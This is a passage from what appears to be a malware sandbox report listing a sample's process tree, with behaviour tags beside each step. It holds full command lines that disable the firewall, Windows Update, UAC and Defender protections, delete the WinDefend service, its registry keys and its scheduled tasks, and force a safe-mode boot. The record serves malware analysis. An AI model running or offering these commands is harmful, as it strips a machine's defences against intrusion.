                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                        2⤵
                                                          PID:428
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                            3⤵
                                                            • Modifies firewall policy service
                                                            PID:3544
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
                                                          2⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5304
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:4592
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                              3⤵
                                                                PID:4468
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name 'NoAutoUpdate' -Value 1"
                                                              2⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5424
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
                                                              2⤵
                                                                PID:6016
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
                                                                  3⤵
                                                                  • Modifies registry key
                                                                  PID:5824
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} safeboot minimal
                                                                2⤵
                                                                  PID:388
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    bcdedit /set {current} safeboot minimal
                                                                    3⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:5516
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
                                                                  2⤵
                                                                    PID:4560
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
                                                                      3⤵
                                                                      • Modifies registry key
                                                                      PID:5820
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
                                                                    2⤵
                                                                      PID:3048
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
                                                                        3⤵
                                                                          PID:1800
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:1096
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
                                                                            3⤵
                                                                              PID:5660
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' -Name 'Notification_Suppress' -Value 1"
                                                                            2⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2520
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:6072
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
                                                                                3⤵
                                                                                  PID:3980
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy' -Name 'DisableNotifications' -Value 1"
                                                                                2⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2912
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /f /im OneDrive.exe & %SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall
                                                                                2⤵
                                                                                  PID:1080
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /f /im OneDrive.exe
                                                                                    3⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1120
                                                                                  • C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                    C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5840
                                                                                    • C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                      "C:\Windows\SysWOW64\OneDriveSetup.exe" C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /permachine /childprocess /silent /enableOMCTelemetry /enableExtractCabV2 /cusid:S-1-5-21-3920955164-3782810283-1225622749-1000
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5076
                                                                                    • C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                      C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /peruser /childprocess /enableOMCTelemetry /enableExtractCabV2
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2584
                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe
                                                                                        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe" /uninstall
                                                                                        5⤵
                                                                                          PID:5924
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
                                                                                    2⤵
                                                                                    • Indicator Removal: Clear Persistence
                                                                                    PID:3600
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
                                                                                      3⤵
                                                                                        PID:3876
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
                                                                                      2⤵
                                                                                        PID:4852
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
                                                                                          3⤵
                                                                                            PID:1748
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                                                                                          2⤵
                                                                                            PID:3508
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                                                                                              3⤵
                                                                                                PID:6120
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableNetworkProtection Disabled"
                                                                                              2⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:656
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                                                                              2⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3960
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
                                                                                              2⤵
                                                                                                PID:4792
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
                                                                                                  3⤵
                                                                                                    PID:3516
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
                                                                                                  2⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3436
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
                                                                                                  2⤵
                                                                                                    PID:5548
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
                                                                                                      3⤵
                                                                                                        PID:1928
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1916
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
                                                                                                      2⤵
                                                                                                        PID:1904
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
                                                                                                          3⤵
                                                                                                            PID:4728
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -PUAProtection Disabled"
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:3556
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
                                                                                                          2⤵
                                                                                                            PID:440
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc delete WinDefend
                                                                                                              3⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:216
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
                                                                                                            2⤵
                                                                                                              PID:4684
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
                                                                                                                3⤵
                                                                                                                  PID:4148
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
                                                                                                                2⤵
                                                                                                                  PID:2144
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
                                                                                                                    3⤵
                                                                                                                      PID:2664
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK' -Value 0"
                                                                                                                    2⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:2892
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK' -Value 0"
                                                                                                                    2⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:4092
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
                                                                                                                    2⤵
                                                                                                                      PID:1348
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
                                                                                                                        3⤵
                                                                                                                          PID:4700
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
                                                                                                                        2⤵
                                                                                                                          PID:4876
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
                                                                                                                            3⤵
                                                                                                                              PID:1268
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
                                                                                                                            2⤵
                                                                                                                              PID:2952
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
                                                                                                                                3⤵
                                                                                                                                  PID:1708
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
                                                                                                                                2⤵
                                                                                                                                  PID:6024
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
                                                                                                                                    3⤵
                                                                                                                                      PID:4996
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
                                                                                                                                    2⤵
                                                                                                                                      PID:1992
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
                                                                                                                                        3⤵
                                                                                                                                          PID:2768
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
                                                                                                                                        2⤵
                                                                                                                                          PID:1908
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
                                                                                                                                            3⤵
                                                                                                                                              PID:4800
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
                                                                                                                                            2⤵
                                                                                                                                              PID:1640
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
                                                                                                                                                3⤵
                                                                                                                                                  PID:2276
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
                                                                                                                                                2⤵
                                                                                                                                                  PID:2964
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3932
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2112
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3792
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c NetSh Advfirewall set allprofiles state off
                                                                                                                                                        2⤵
                                                                                                                                                          PID:6020
                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                            NetSh Advfirewall set allprofiles state off
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                            PID:2856
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4104
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5044
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies Windows Defender TamperProtection settings
                                                                                                                                                                PID:5468
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
                                                                                                                                                              2⤵
                                                                                                                                                              • Modifies Windows Defender TamperProtection settings
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:2440
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2744
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
                                                                                                                                                                  3⤵
                                                                                                                                                                  • UAC bypass
                                                                                                                                                                  PID:3136
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
                                                                                                                                                                2⤵
                                                                                                                                                                • Modifies Windows Defender TamperProtection settings
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:4300
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c sc config WinDefend start= disabled
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5736
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc config WinDefend start= disabled
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:4696
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4248
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc stop WinDefend
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:1568
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Indicator Removal: Clear Persistence
                                                                                                                                                                    PID:2980
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4148
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Indicator Removal: Clear Persistence
                                                                                                                                                                      PID:216
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4784
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Indicator Removal: Clear Persistence
                                                                                                                                                                        PID:2836
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4864
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Indicator Removal: Clear Persistence
                                                                                                                                                                          PID:4312
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5448
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c rem Disable Windows Security net stop "security center" net stop sharedaccess netsh firewall set opmode mode-disable
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:972
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /f
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1984
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4504
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Advanced Threat Protection" /f
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2672
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Advanced Threat Protection" /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5200
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2524
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                          PID:5764
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /f
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3456
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /f
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:852
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
